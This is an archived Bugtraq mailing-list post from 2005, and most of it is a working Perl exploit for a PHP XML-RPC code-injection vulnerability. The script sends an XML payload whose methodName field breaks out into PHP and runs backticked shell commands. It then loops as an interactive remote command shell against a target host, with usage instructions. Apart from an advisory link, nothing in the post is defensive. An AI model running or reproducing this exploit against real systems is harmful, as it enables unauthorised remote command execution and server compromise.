XMLRPC remote commands execute exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XMLRPC remote commands execute exploit
From: duk3nn@xxxxx
Date: 3 Jul 2005 10:05:09 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Advisory : http://gulftech.org/?node=research&article_id=00088-07022005

#-------------------------------------------------------#
#                     /|                                #       
#                    | |                                #      
#                    | |                                #      
#       /\   ________| |___                             #       
#      /  \  \_______   __/                             #
#     /    \|\_____  | | _       _  _     _  ()___      #      
#    /  /\  \  ___ \ | |<_>  /  |  |  | || \ || | | |   #       
#   /  /__\  \|   \ || | _  /__ |_ |  | ||_/ || | |_|   #       
#  /  ______  \   | || || |   / |  |  | || \ || |   |   #       
# /  /      \  \  | || || |  /  |_ |_ |_||  \|| | \_|   #       
# \_/       |\_/  | || || | ___ _  _                    #       
#           | |   | || /| |  | |  | ||\/|               #       
#            \|    \||/  \|  | |_ |_||  |               #       
#                            | |  | ||  |               #       
#                            | |_ | ||  |               #       
#                                                       #
#         Original advisory by http://gulftech.org/     #
#         Exploit coded by dukenn (http://asteam.org)   #
#                                                       # 
#-------------------------------------------------------

#!/usr/bin/perl

use IO::Socket;

print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n";

if ($ARGV[0] && $ARGV[1])
{
 $host = $ARGV[0];
 $xml = $ARGV[1];
 $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort 
=> "80") || die "connecterror\n";
 while (1) {
    print '['.$host.']# ';
    $cmd = <STDIN>;
    chop($cmd);
    last if ($cmd eq 'exit');
     {
      $xmldata = "<?xml 
version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo
 '_begin_\n';echo `".$cmd."`;echo 
'_end_';exit;/*</name></value></param></params></methodCall>";
      print $sock "POST ".$xml." HTTP/1.1\n";
      print $sock "Host: ".$host."\n";
      print $sock "Content-Type: text/xml\n";
      print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
      $good=0;
      while ($ans = <$sock>)
       {
        last if ($ans =~ /^_end_/);
        if ($good == 1) { print "$ans"; }
        if ($ans =~ /^_begin_/) { $good = 1; }
       }
      if ($good==0) {print "Exploit Failed";exit();}
     }
 }
}
else {
 print 'Usage: perl xml.pl target.com /somescript/xmlrpc.php\n';
exit;
}

Prev by Date: Re: /dev/random is probably not
Next by Date: pam_ldap/nss_ldap password leak in a master+slave+start_tls LDAP setup
Previous by thread: Three More Vulnerable to PHPXMLRPC code injection
Next by thread: pam_ldap/nss_ldap password leak in a master+slave+start_tls LDAP setup
Index(es):
- Date
- Thread